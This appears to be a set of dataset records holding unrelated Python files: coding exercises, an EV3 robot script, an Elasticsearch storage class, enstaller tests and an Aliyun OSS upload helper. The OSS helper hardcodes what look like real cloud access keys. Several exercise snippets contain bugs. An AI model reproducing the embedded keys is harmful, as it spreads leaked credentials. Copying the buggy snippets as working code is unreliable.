remove_duplicates(sorted_array: List[int]) -> None:\n for val in sorted_array:\n while sorted_array.count(val) >= 3:\n sorted_array.remove(val)\n\nif __name__ == \"__main__\":\n main_test = [1, 1, 1, 2, 3, 4, 5, 4, 6, 6, 9]\n print(\"[BEFORE]:\", main_test)\n\n remove_duplicates(sorted_array=main_test)\n\n print(\"[AFTER]:\", main_test)\n","sub_path":"online-workouts/leet-code/easy/remove-duplicates-from-sorted-array-2.py","file_name":"remove-duplicates-from-sorted-array-2.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"394148357","text":"\n\"\"\"\nAuthor: Patrick Addis\n\"\"\"\n\nimport mqtt_remote_method_calls as com\nimport robot_controller as robo\n\nimport ev3dev.ev3 as ev3\nimport time\n\n\n# mqtt_client.connect_to_pc(\"35.194.247.175\") # Off campus IP address of a GCP broker\n\n\nCOLOR_NAMES = [\"None\", \"Black\", \"Blue\", \"Green\", \"Yellow\", \"Red\", \"White\", \"Brown\"]\n\n\nclass DataContainer(object):\n\n def __init__(self):\n self.running = True\n\n\ndc = DataContainer()\n\n\ndef on_down(robot, mqtt_client):\n print(robot.is_running())\n while robot.is_running():\n drive_to_color(robot, ev3.ColorSensor.COLOR_BLUE, mqtt_client)\n\n\ndef main():\n robot = robo.Snatch3r()\n mqtt_client = com.MqttClient(robot)\n mqtt_client.connect_to_pc()\n ev3.Sound.speak(\"Drive to the color\").wait()\n print(\"Press Back to exit this program.\")\n\n btn = ev3.Button()\n btn.on_backspace = lambda state: handle_shutdown(state, dc)\n\n while dc.running:\n btn.process()\n time.sleep(0.01)\n on_down(robot, mqtt_client)\n\n print(\"Goodbye!\")\n ev3.Sound.speak(\"Goodbye\").wait()\n\n\n# ----------------------------------------------------------------------\n# Event handlers\n# ----------------------------------------------------------------------\ndef drive_to_color(robot, color_to_seek, mqtt_client):\n \"\"\"\n When the button_state is True (pressed), drives the robot forward until the desired color is detected.\n When the color_to_seek is detected the robot stops moving forward and speaks a message.\n\n Type hints:\n :type button_state: bool\n :type robot: robo.Snatch3r\n :type color_to_seek: int\n \"\"\"\n ev3.Sound.speak(\"Seeking \" + COLOR_NAMES[color_to_seek]).wait()\n while robot.is_running():\n if color_to_seek != robot.color_sensor.color:\n print('Not Found')\n else:\n robot.drive_inches(-6, 500)\n mqtt_client.send_message(\"pc_window\", [])\n break\n robot.stop()\n\n ev3.Sound.speak(\"Found \" + COLOR_NAMES[color_to_seek]).wait()\n\n\ndef handle_shutdown(button_state, dc):\n \"\"\"Exit the program.\"\"\"\n if button_state:\n dc.running = False\n\n\n# ----------------------------------------------------------------------\n# Calls main to start the ball rolling.\n# ----------------------------------------------------------------------\nmain()\n","sub_path":"projects/addispz/Actual Code_ev3.py","file_name":"Actual Code_ev3.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"206807931","text":"import opf\r\nimport pandas as pd\r\n\r\n# Import generation and load profiles\r\nPdDF = pd.read_excel('Data.xlsx', sheet_name='Pd', index_col=0)\r\nQdDF = pd.read_excel('Data.xlsx', sheet_name='Qd', index_col=0)\r\nPpvDF = pd.read_excel('Data.xlsx', sheet_name='Ppv', index_col=0)\r\nQpvDF = pd.read_excel('Data.xlsx', sheet_name='Qpv', index_col=0)\r\nPwtDF = pd.read_excel('Data.xlsx', sheet_name='Pwt', index_col=0)\r\nQwtDF = pd.read_excel('Data.xlsx', sheet_name='Qwt', index_col=0)\r\nPG2DF = pd.read_excel('Data.xlsx', sheet_name='PG2', index_col=0)\r\nQG2DF = pd.read_excel('Data.xlsx', sheet_name='QG2', index_col=0)\r\nPC1DF = pd.read_excel('Data.xlsx', sheet_name='PC1', index_col=0)\r\nQC1DF = pd.read_excel('Data.xlsx', sheet_name='QC1', index_col=0)\r\n\r\nPdDict = { (t,c) : PdDF.to_dict('index')[t][c] for t in PdDF.index for c in PdDF.columns }\r\nQdDict = { (t,c) : QdDF.to_dict('index')[t][c] for t in QdDF.index for c in QdDF.columns }\r\nPpvDict = { (t,c) : PpvDF.to_dict('index')[t][c] for t in PpvDF.index for c in PpvDF.columns }\r\nQpvDict = { (t,c) : QpvDF.to_dict('index')[t][c] for t in QpvDF.index for c in QpvDF.columns }\r\nPwtDict = { (t,c) : PwtDF.to_dict('index')[t][c] for t in PwtDF.index for c in PwtDF.columns }\r\nQwtDict = { (t,c) : QwtDF.to_dict('index')[t][c] for t in QwtDF.index for c in QwtDF.columns }\r\nPG2Dict = { (t,c) : PG2DF.to_dict('index')[t][c] for t in PG2DF.index for c in PG2DF.columns }\r\nQG2Dict = { (t,c) : QG2DF.to_dict('index')[t][c] for t in QG2DF.index for c in QG2DF.columns }\r\nPC1Dict = { (t,c) : PC1DF.to_dict('index')[t][c] for t in PC1DF.index for c in PC1DF.columns }\r\nQC1Dict = { (t,c) : QC1DF.to_dict('index')[t][c] for t in QC1DF.index for c in QC1DF.columns }\r\n\r\n# Solve OPF\r\nopf.opf(PdDict, QdDict, PpvDict, QpvDict, PwtDict, QwtDict, PG2Dict, QG2Dict, PC1Dict, QC1Dict)","sub_path":"OPF_Original - 11_07_19/myRun.py","file_name":"myRun.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"238158776","text":"# -*- coding: utf-8 -*-\nimport base64\nimport os\nimport oss2\n\n# 首先初始化AccessKeyId、AccessKeySecret、Endpoint等信息。\n# 通过环境变量获取,或者把诸如“<你的AccessKeyId>”替换成真实的AccessKeyId等。\naccess_key_id = os.getenv('OSS_TEST_ACCESS_KEY_ID', 'LTAI4FkXV5WzzQiVx6Jj8Lna')\naccess_key_secret = os.getenv('OSS_TEST_ACCESS_KEY_SECRET', '2iw8aulSCNJovwpLIMQ8VM8JUk8Uci')\nbucket_name = os.getenv('OSS_TEST_BUCKET', 'ynd-picture')\nendpoint = os.getenv('OSS_TEST_ENDPOINT', 'oss-cn-beijing.aliyuncs.com')\n\n# 确认上面的参数都填写正确了\nfor param in (access_key_id, access_key_secret, bucket_name, endpoint):\n assert '<' not in param, '请设置参数:' + param\n\n# 创建Bucket对象,所有Object相关的接口都可以通过Bucket对象来进行\nbucket = oss2.Bucket(oss2.Auth(access_key_id, access_key_secret), endpoint, bucket_name)\n\n\ndef goodfile_upload(goodname, file, num):\n if file is None:\n return '没有检索到文件'\n else:\n # 上传文件到阿里云OSS\n goodimg = bucket.put_object(goodname + str(num) + \".jpg\", file)\n if goodimg.status == 200:\n # 上传成功,获取文件带签名的地址,返回给前端\n url = \"https://ynd-picture.oss-cn-beijing.aliyuncs.com/\" + goodname + str(num) + '.jpg'\n # 返回user头像的路径\n return url\n else:\n return \"上传失败,请重新上传\"\n\n\n# 更新,修改图片num为第几张图片\ndef changefile_upload(goodname, num, img):\n bucket.delete_object(goodname + num + '.jpg')\n goodimg = base64.b64decode(img)\n # 括号内左边为上传的文件名存储名称,右边为上传的图片\n res = bucket.put_object(goodname + '.jpg', goodimg)\n if res.status == 200:\n url = \"https://ynd-picture.oss-cn-beijing.aliyuncs.com/\" + goodname + str(num) + '.jpg'\n # 返回user头像的路径\n return \"更新成功!\"\n else:\n return \"上传失败,请重新上传\"\n\n\n# 删除用户头像,username=登录用户名\ndef delete_goodimg(username):\n bucket.delete_object(username + '.jpg')\n# 用户上传头像,username=登录用户名,img为base64格式的字符串\n","sub_path":"seller_goods/oss_file_upload/img_upload.py","file_name":"img_upload.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"298167582","text":"import numpy as np \r\nimport matplotlib.pyplot as plt \r\n#当scatter后面的参数中的数组的使用方法,s是同x大小的数组,表示x中的每个点对应s中一个大小,\r\nX_list=[1,2,3,4,5,6]\r\nY_list=[2.5,3.51,4.45,5.52,6.47,7.51]\r\n\r\nx=np.arange(1,10)\r\nprint(x)\r\ny=x \r\nprint(type(x))\r\nprint(type(y))\r\nfig=plt.figure()\r\nax1=fig.add_subplot(111)\r\n#设置标题\r\nax1.set_title(\"Scatter Plot\")\r\n#设置X轴标签\r\nplt.xlabel(\"X\")\r\n#设置Y轴标签\r\nplt.ylabel(\"Y\")\r\n#画散点图\r\nsValue=40*x\r\ncValue=['r','y','g','b','r','b','g','g','b']\r\nIValue=x\r\n#ax1.scatter(x,y,s=100,linewidths=IValue,marker='o')#linewidths # 控制points边缘线的粗细\r\n#ax1.scatter(x,y,c='r',marker='o')\r\n#ax1.scatter(x,y,c='r',marker='o')\r\n#ax1.scatter(x,y,s=sValue,c='r',marker='x')#s--控制points大小\r\n#list类型的也可以画出来\r\nax1.scatter(X_list,Y_list,s=sValue,c='r',marker='x')#s--控制points大小\r\n\r\n#ax1.scatter(x,y,c=cValue,marker='s')\r\n#设置图标\r\nplt.legend(\"x1\")\r\n#显示所画的图\r\nplt.show()","sub_path":"python/matplotlib/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"425501752","text":"#!/usr/bin/env python3\n\nimport sys\n\ndef main(args):\n print(\"Hello world!\")\n\n pos=(0,0)\n\n x=0\n\n up=(0,1)\n down=(0,-1)\n left=(1,0)\n right=(-1,0)\n dir=[up,left,down,right]\n\n for i in argv[1]:\n if (i=='L'):\n x+=1\n elif (i=='R'):\n x-=1\n if (x==4):\n x=0\n if (x==-1):\n x=3\n\n if (i!='O' and i!='L' and i!='R'):\n pos+=dir\n\n\n return 0\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"pathfix.py","file_name":"pathfix.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"5287720","text":"from functools import lru_cache\nfrom typing import Dict, Iterable, Optional\n\nfrom elasticsearch import AsyncElasticsearch, NotFoundError\nfrom fastapi import Depends\n\nfrom db.base import DEFAULT_LIMIT, AbstractDBStorage\n\nes: AsyncElasticsearch = None\n\n# Функция понадобится при внедрении зависимостей\nasync def get_elastic() -> AsyncElasticsearch:\n return es\n\n\nclass ElasticStorage(AbstractDBStorage):\n def __init__(self, elastic: AsyncElasticsearch, index_name: str):\n self.elastic = elastic\n self.index_name = index_name\n\n async def get(self, id: str) -> Optional[Dict]:\n try:\n doc = await self.elastic.get(index=self.index_name, id=id)\n except NotFoundError:\n return None\n\n return doc[\"_source\"]\n\n async def filter(\n self,\n filter_map: Optional[dict] = None,\n search_map: Optional[dict] = None,\n order_map: Optional[dict] = None,\n offset: int = 0,\n limit: int = DEFAULT_LIMIT,\n **kwargs,\n ) -> Iterable[Dict]:\n filter_map = filter_map or {}\n search_map = search_map or {}\n order_map = order_map or {}\n\n body = {}\n if filter_map or search_map:\n body[\"query\"] = self.get_query(filter_map, search_map)\n\n docs = await self.elastic.search(\n index=self.index_name,\n sort=[f\"{field}:{direction}\" for field, direction in order_map.items()],\n from_=offset,\n size=limit,\n body=body,\n )\n return [doc[\"_source\"] for doc in docs[\"hits\"][\"hits\"]]\n\n def get_query(self, filter_map: Dict, search_map: Dict) -> Dict:\n query = {}\n\n if search_map:\n field, match_obj = list(search_map.items())[0]\n query[\"match\"] = {field: match_obj}\n\n return query\n\n\nclass ElasticFilmStorage(ElasticStorage):\n def get_query(self, filter_map: Dict, search_map: Dict) -> Dict:\n query = super().get_query(filter_map, search_map)\n\n if \"genre_id\" in filter_map:\n query[\"nested\"] = {\n \"path\": \"genres\",\n \"query\": {\"term\": {\"genres.id\": str(filter_map[\"genre_id\"])}},\n }\n\n for role in [\"actor\", \"director\", \"writer\"]:\n key = f\"{role}_id\"\n if key in filter_map:\n path = f\"{role}s\"\n query[\"nested\"] = {\n \"path\": path,\n \"query\": {\"term\": {f\"{path}.id\": str(filter_map[key])}},\n }\n\n return query\n\n\n@lru_cache()\ndef get_genre_storage(elastic: AsyncElasticsearch = Depends(get_elastic)) -> ElasticStorage:\n return ElasticStorage(elastic=elastic, index_name=\"genres\")\n\n\n@lru_cache()\ndef get_film_storage(elastic: AsyncElasticsearch = Depends(get_elastic)) -> ElasticFilmStorage:\n return ElasticFilmStorage(elastic=elastic, index_name=\"movies\")\n\n\n@lru_cache()\ndef get_person_storage(elastic: AsyncElasticsearch = Depends(get_elastic)) -> ElasticStorage:\n return ElasticStorage(elastic=elastic, index_name=\"persons\")\n","sub_path":"app/db/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"613411995","text":"coordx = eval(input(\"Give the coordinate x: \"))\ncoordy = eval(input(\"Give the coordinate y: \"))\ncoord=[]\ncoord.append(coordx)\ncoord.append(coordy)\ncoord = tuple(coord)\ncolumn = [\" \",\" \",\" \",\" \",\"|\",\" \",\" \",\" \",\" \"]\nrow = [\"—\",\"—\",\"—\",\"—\",\" \",\"—\",\"—\",\"—\",\"—\"]\ncolumnwritten=[\" \",\" \",\" \",\" \",\"|\",\" \",\" \",\" \",\" \"]\nif coord[1] < 0 or coord[1] >0:\n\tcolumnwritten[coord[0]+4]=\"*\"\nelse:\n\trow[coord[0]+4]=\"*\"\ncounter=0\nwhile counter < 9:\n\tif counter-4 == -coord[1]:\n\t\tn=0\n\t\tif coord[1]<0 or coord[1]>0:\n\t\t\twhile n<9:\n\t\t\t\tprint(columnwritten[n],end=\" \")\n\t\t\t\tn+=1\n\t\telse:\n\t\t\twhile n<9:\n\t\t\t\tprint(row[n],end=\" \")\n\t\t\t\tn+=1\n\t\tprint(\"\\n\")\n\telif counter<4:\n\t\tn=0\n\t\twhile n<9:\n\t\t\tprint(column[n],end=\" \")\n\t\t\tn+=1\n\t\tprint(\"\\n\")\t\n\telif counter>4:\n\t\tn=0\n\t\twhile n<9:\n\t\t\tprint(column[n],end=\" \")\n\t\t\tn+=1\n\t\tprint(\"\\n\")\n\telse:\n\t\tn=0\n\t\twhile n<9:\n\t\t\tprint(row[n],end=\" \")\n\t\t\tn+=1\n\t\tprint(\"\\n\")\n\tcounter+=1\nif coord[0]==0 and coord[1]==0:\n\tprint(\"it is the origin of the coordinate system\")\nelif coord[0]>0 and coord[1]>0:\n\tprint(\"it is on the first zone\")\nelif coord[0] <0 and coord[1]>0:\n\tprint(\"it is on the second zone\")\nelif coord[0] <0 and coord[1]<0:\n\tprint(\"it is on the third zone\")\nelif coord[0] >0 and coord[1] <0:\n\tprint(\"it is on the forth zone\")\nelif coord[0] == 0 and coord[1]>0:\n\tprint(\"it is on the positive y-axis\")\nelif coord[0] == 0 and coord[1]<0:\n\tprint(\"it is on the negative y-axis\")\nelif coord[0]>0 and coord[1] == 0:\n\tprint(\"it is on the positive x-axis\")\nelif coord[0]<0 and coord[1] == 0:\n\tprint(\"it is on the negative x-axis\")\n","sub_path":"coordinateSystem.py","file_name":"coordinateSystem.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"288135649","text":"class Solution:\n def exist(self, board, word):\n if len(word)==0:\n return False\n list=self.find(board,word[0])\n for l in list:\n mark = [[True for t in temp] for temp in board]\n r=self.search(board, word, mark,l[0],l[1])\n if r==True:\n return True\n return False\n def search(self,borad,word,mark,i,j):\n if len(word)==0:\n return True\n if i<0 or i>=len(borad) or j<0 or j>=len(borad[0]):\n return False\n if mark[i][j] and borad[i][j]==word[0]:\n mark[i][j]=False\n down=self.search(borad,word[1:],mark,i+1,j)\n if down :\n return down\n up = self.search(borad,word[1:], mark, i - 1, j)\n if up :\n return up\n right = self.search(borad,word[1:], mark, i , j+1)\n if right:\n return right\n left = self.search(borad,word[1:], mark, i , j-1)\n mark[i][j] = True\n return left\n else:\n return False\n\n def find(self,board,s):\n list=[]\n for i,temp in enumerate(board):\n for j,t in enumerate(temp):\n if t==s:\n list.append([i,j])\n return list\n\ns=Solution()\n\ntest=[\n{\"input\":[[[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"E\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]],\"ABCESEEEFS\"],\"output\":True},\n{\"input\":[[[\"C\",\"A\",\"A\"],[\"A\",\"A\",\"A\"],[\"B\",\"C\",\"D\"]],\"AAB\"],\"output\":True},\n{\"input\":[[\n ['A','B','C','E'],\n ['S','F','C','S'],\n ['A','D','E','E']\n],\"ABCCED\"],\"output\":True},\n{\"input\":[[\n ['A','B','C','E'],\n ['S','F','C','S'],\n ['A','D','E','E']\n],\"SEE\"],\"output\":True},\n{\"input\":[[\n ['A','B','C','E'],\n ['S','F','C','S'],\n ['A','D','E','E']\n],\"ABCB\"],\"output\":False},\n\n]\nfor t in test:\n r=s.exist(t['input'][0],t['input'][1])\n if r!=t['output']:\n print(\"error:\"+str(t)+\" out:\"+str(r))\n r = s.exist(t['input'][0], t['input'][1])","sub_path":"51-100/79. 单词搜索.py","file_name":"79. 单词搜索.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321581847","text":"from __future__ import absolute_import, print_function\n\nimport datetime\nimport os\nimport shutil\nimport tempfile\nimport textwrap\n\nimport mock\n\nfrom egginst._compat import assertCountEqual\nfrom egginst.tests.common import mkdtemp\nfrom egginst.vendor.six.moves import unittest\n\nfrom enstaller.config import Configuration\nfrom enstaller.tests.common import (FAKE_MD5, FAKE_SIZE, PY_VER,\n FakeOptions,\n create_prefix_with_eggs,\n create_repositories,\n dummy_installed_package_factory,\n dummy_repository_package_factory,\n mock_print)\n\nfrom ..commands import (info_option, install_from_requirements, update_all,\n whats_new)\n\n\nclass TestInfoStrings(unittest.TestCase):\n def test_info_option(self):\n self.maxDiff = None\n\n # Given\n mtime = 0.0\n r_output = textwrap.dedent(\"\"\"\\\n Package: enstaller\n\n Version: 4.6.2-1\n Product: commercial\n Available: True\n Python version: {2}\n Store location: {3}\n Last modified: {4}\n MD5: {0}\n Size: {1}\n Requirements: None\n Version: 4.6.3-1\n Product: commercial\n Available: True\n Python version: {2}\n Store location: {3}\n Last modified: {4}\n MD5: {0}\n Size: {1}\n Requirements: None\n \"\"\".format(FAKE_MD5, FAKE_SIZE, PY_VER, \"\",\n datetime.datetime.fromtimestamp(mtime)))\n\n entries = [dummy_repository_package_factory(\"enstaller\", \"4.6.2\", 1),\n dummy_repository_package_factory(\"enstaller\", \"4.6.3\", 1)]\n\n remote_repository, installed_repository = \\\n create_repositories(remote_entries=entries)\n\n # When\n with mock_print() as m:\n info_option(remote_repository, installed_repository,\n \"enstaller\")\n # Then\n self.assertMultiLineEqual(m.value, r_output)\n\n\nclass TestUpdatesCheck(unittest.TestCase):\n def test_whats_new_no_new_epd(self):\n # Given\n r_output = textwrap.dedent(\"\"\"\\\n Name installed available\n ============================================================\n scipy 0.12.0-1 0.13.0-1\n numpy 1.7.1-1 1.7.1-2\n \"\"\")\n installed_entries = [\n dummy_installed_package_factory(\"numpy\", \"1.7.1\", 1),\n dummy_installed_package_factory(\"scipy\", \"0.12.0\", 1)\n ]\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.7.1\", 2),\n dummy_repository_package_factory(\"scipy\", \"0.13.0\", 1)\n ]\n\n remote, installed = create_repositories(remote_entries,\n installed_entries)\n\n # When\n with mock_print() as m:\n whats_new(remote, installed)\n\n # Then\n\n # FIXME: we splitlines and compared wo caring about order, as\n # the actual line order depends on dict ordering from\n # EggCollection.query_installed.\n assertCountEqual(self, m.value.splitlines(), r_output.splitlines())\n\n def test_whats_new_new_epd(self):\n # Given\n r_output = \"EPD 7.3-2 is available. To update to it (with \" \\\n \"confirmation warning), run 'enpkg epd'.\\n\"\n installed_entries = [\n dummy_installed_package_factory(\"EPD\", \"7.2\", 1),\n ]\n remote_entries = [\n dummy_repository_package_factory(\"EPD\", \"7.3\", 2),\n ]\n\n remote, installed = create_repositories(remote_entries,\n installed_entries)\n\n # When\n with mock_print() as m:\n whats_new(remote, installed)\n\n # Then\n self.assertMultiLineEqual(m.value, r_output)\n\n def test_whats_new_no_updates(self):\n # Given\n r_output = \"No new version of any installed package is available\\n\"\n\n installed_entries = [\n dummy_installed_package_factory(\"numpy\", \"1.7.1\", 2),\n dummy_installed_package_factory(\"scipy\", \"0.13.0\", 1)\n ]\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.7.1\", 1),\n dummy_repository_package_factory(\"scipy\", \"0.12.0\", 1)\n ]\n\n remote, installed = create_repositories(remote_entries,\n installed_entries)\n\n # When\n with mock_print() as m:\n whats_new(remote, installed)\n\n # Then\n self.assertMultiLineEqual(m.value, r_output)\n\n def test_update_all_no_updates(self):\n r_output = \"No new version of any installed package is available\\n\"\n config = Configuration()\n\n installed_entries = [\n dummy_installed_package_factory(\"numpy\", \"1.7.1\", 2),\n dummy_installed_package_factory(\"scipy\", \"0.13.0\", 1)\n ]\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.7.1\", 1),\n dummy_repository_package_factory(\"scipy\", \"0.12.0\", 1)\n ]\n\n with mkdtemp() as d:\n enpkg = create_prefix_with_eggs(config, d,\n installed_entries, remote_entries)\n with mock_print() as m:\n update_all(enpkg, config, FakeOptions())\n self.assertMultiLineEqual(m.value, r_output)\n\n def test_update_all_no_epd_updates(self):\n r_output = textwrap.dedent(\"\"\"\\\n The following updates and their dependencies will be installed\n Name installed available\n ============================================================\n scipy 0.13.0-1 0.13.2-1\n \"\"\")\n config = Configuration()\n\n installed_entries = [\n dummy_installed_package_factory(\"numpy\", \"1.7.1\", 2),\n dummy_installed_package_factory(\"scipy\", \"0.13.0\", 1),\n dummy_installed_package_factory(\"epd\", \"7.3\", 1),\n ]\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.7.1\", 1),\n dummy_repository_package_factory(\"scipy\", \"0.13.2\", 1),\n dummy_repository_package_factory(\"epd\", \"7.3\", 1),\n ]\n\n with mkdtemp() as d:\n enpkg = create_prefix_with_eggs(config, d, installed_entries, remote_entries)\n with mock.patch(\"enstaller.cli.commands.install_req\") as mocked_install_req:\n with mock_print() as m:\n update_all(enpkg, config, FakeOptions())\n self.assertMultiLineEqual(m.value, r_output)\n mocked_install_req.assert_called()\n\n def test_update_all_epd_updates(self):\n r_output = textwrap.dedent(\"\"\"\\\n EPD 7.3-2 is available. To update to it (with confirmation warning), run 'enpkg epd'.\n The following updates and their dependencies will be installed\n Name installed available\n ============================================================\n scipy 0.13.0-1 0.13.2-1\n \"\"\")\n config = Configuration()\n\n installed_entries = [\n dummy_installed_package_factory(\"numpy\", \"1.7.1\", 2),\n dummy_installed_package_factory(\"scipy\", \"0.13.0\", 1),\n dummy_installed_package_factory(\"epd\", \"7.3\", 1),\n ]\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.7.1\", 1),\n dummy_repository_package_factory(\"scipy\", \"0.13.2\", 1),\n dummy_repository_package_factory(\"epd\", \"7.3\", 2),\n ]\n\n with mkdtemp() as d:\n enpkg = create_prefix_with_eggs(config, d, installed_entries, remote_entries)\n with mock.patch(\"enstaller.cli.commands.install_req\") as mocked_install_req:\n with mock_print() as m:\n update_all(enpkg, config, FakeOptions())\n self.assertMultiLineEqual(m.value, r_output)\n mocked_install_req.assert_called()\n\n\nclass TestInstallFromRequirements(unittest.TestCase):\n def setUp(self):\n self.prefix = tempfile.mkdtemp()\n\n def tearDown(self):\n shutil.rmtree(self.prefix)\n\n def test_install_from_requirements(self):\n # Given\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.8.0\", 1),\n dummy_repository_package_factory(\"numpy\", \"1.8.0\", 2),\n dummy_repository_package_factory(\"nose\", \"1.2.1\", 2),\n dummy_repository_package_factory(\"nose\", \"1.3.0\", 1)\n ]\n\n requirements_file = os.path.join(self.prefix, \"requirements.txt\")\n with open(requirements_file, \"w\") as fp:\n fp.write(\"numpy 1.8.0-1\\nnose 1.2.1-1\")\n\n config = Configuration()\n enpkg = create_prefix_with_eggs(config, self.prefix, [], remote_entries)\n args = FakeOptions()\n args.requirements = requirements_file\n\n # When\n with mock.patch(\"enstaller.cli.commands.install_req\") as mocked_install_req:\n install_from_requirements(enpkg, config, args)\n\n # Then\n mocked_install_req.assert_has_calls(\n [mock.call(enpkg, config, \"numpy 1.8.0-1\", args),\n mock.call(enpkg, config, \"nose 1.2.1-1\", args)])\n","sub_path":"venv/lib/python2.7/site-packages/enstaller/cli/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":9606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"169729778","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport six\n\nfrom reprep import VALID_ID_REGEXP\nfrom contracts import new_contract, contract\nimport re\n\n__all__ = ['valid_id', 'sanitize_id']\n\n@new_contract\ndef valid_id(s):\n assert isinstance(s, six.string_types)\n\n if re.match(VALID_ID_REGEXP, s) is None:\n msg = ('The given string %r does not match the spec %r.' % \n (s, VALID_ID_REGEXP))\n raise ValueError(msg)\n\n@contract(returns='valid_id')\ndef sanitize_id(nid):\n nid = nid.replace('/', '_')\n nid = nid.replace('.', '_')\n return nid\n","sub_path":"duckietown-world-venv/lib/python3.6/site-packages/reprep/repcontracts.py","file_name":"repcontracts.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"167296764","text":"# This is just part of documentation:\n# A signature is a tuple of strings (each an affix).\n# Signatures is a map: its keys are signatures. Its values are *sets* of stems.\n# StemToWord is a map; its keys are stems. Its values are *sets* of words.\n# StemToSig is a map; its keys are stems. Its values are individual signatures.\n# WordToSig is a Map. its keys are words. Its values are *lists* of signatures.\n# StemCounts is a map. Its keys are words. \t Its values are corpus counts of stems.\n# SignatureToStems is a dict: its keys are tuples of strings, and its values are dicts of stems.\n\nclass CWordList:\n def __init__(self):\n self.mylist = list()\n print\n \"initializing the wordlist\"\n\n def AddWord(self, word):\n self.mylist.append(Word(word))\n\n def at(self, n):\n return self.mylist[n]\n\n def sort(self):\n self.mylist.sort(key=lambda item: item.Key)\n # for item in self.mylist:\n #\tprint item.Key\n for i in range(len(self.mylist)):\n word = self.mylist[i]\n word.leftindex = i\n templist = list()\n for word in self.mylist:\n thispair = (word.Key[::-1], word.leftindex)\n templist.append(thispair)\n templist.sort(key=lambda item: item[0])\n for i in range(len(self.mylist)):\n (drow, leftindex) = templist[i]\n self.mylist[leftindex].rightindex = i\n\n def PrintXY(self, outfile):\n Size = float(len(self.mylist))\n for word in self.mylist:\n x = word.leftindex / Size\n y = word.rightindex / Size\n print >> outfile, \"{:20s}{:8.6}{:8.6}\".format(word.Key, x, y), \"hello\"\n\n\nclass CLexicon:\n def __init__(self):\n self.WordList = CWordList()\n self.WordCounts = dict()\n\n self.Signatures = dict()\n self.SignatureToStems = {}\n self.WordToSig = {}\n self.StemToWord = {}\n self.StemToAffix = {}\n self.StemCounts = {}\n self.StemToSig = {}\n self.MinimumStemsInaSignature = 3\n self.MinimumStemLength = 5\n self.NumberOfAnalyzedWords = 0\n\n self.LettersInAnalyzedWords = 0\n self.NumberOfUnanalyzedWords = 0\n self.LettersInUnanalyzedWords = 0\n self.TotalLetterCountInWords = 0\n self.LettersInStems = 0\n self.AffixLettersInSignatures = 0\n\n self.TotalRobustInSignatures = 0\n\n def PrintWordList(self, outfile):\n self.WordList.PrintXY(outfile)\n\n\nclass Word:\n def __init__(self, key):\n self.Key = key\n self.leftindex = -1\n self.rightindex = -1\n\n\ndef byWordKey(word):\n return word.Key\n\n\nclass CSignature:\n count = 0\n\n def __init__(self):\n self.Index = 0\n self.Affixes = tuple()\n self.StartStateIndex = CSignature.count\n self.MiddleStateIndex = CSignature.Count + 1\n self.EndStateIndex = CSignature.count + 2\n CSignature.count += 3\n\n def Display(self):\n returnstring = \"\"\n affixes = list(self.Affixes)\n affixes.sort()\n return \"-\".join(affixes)\n\n # ------------------------------------------------------------------------------------------##------------------------------------------------------------------------------------------#\n\n\nclass parseChunk:\n def __init__(self, thismorph, rString, thisedge=None):\n # print \"in parsechunk constructor, with \", thismorph, \"being passed in \"\n self.morph = thismorph\n self.edge = thisedge\n self.remainingString = rString\n if (self.edge):\n self.fromState = self.edge.fromState\n self.toState = self.edge.toState\n else:\n self.fromState = None\n self.toState = None\n # print self.morph, \"that's the morph\"\n # print self.remainingString, \"that's the remainder\"\n\n def Copy(self, otherChunk):\n self.morph = otherChunk.morph\n self.edge = otherChunk.edge\n self.remainingString = otherChunk.remainingString\n\n def Print(self):\n returnstring = \"morph: \" + self.morph\n if self.remainingString == \"\":\n returnstring += \", no remaining string\",\n else:\n returnstring += \"remaining string is \" + self.remainingString\n if self.edge:\n return \"-(\" + str(self.fromState.index) + \")\" + self.morph + \"(\" + str(\n self.toState.index) + \") -\" + \"remains:\" + returnstring\n else:\n return returnstring + \"!\" + self.morph + \"no edge on this parsechunk\"\n\n\n # ----------------------------------------------------------------------------------------------------------------------------#\n\n\nclass ParseChain:\n def __init__(self):\n self.my_chain = list()\n\n def Copy(self, other):\n for parsechunk in other.my_chain:\n newparsechunk = parseChunk(parsechunk.morph, parsechunk.remainingString, parsechunk.edge)\n self.my_chain.append(newparsechunk)\n\n def Append(self, parseChunk):\n # print \"Inside ParseChain Append\"\n self.my_chain.append(parseChunk)\n\n def Print(self, outfile):\n returnstring = \"\"\n columnwidth 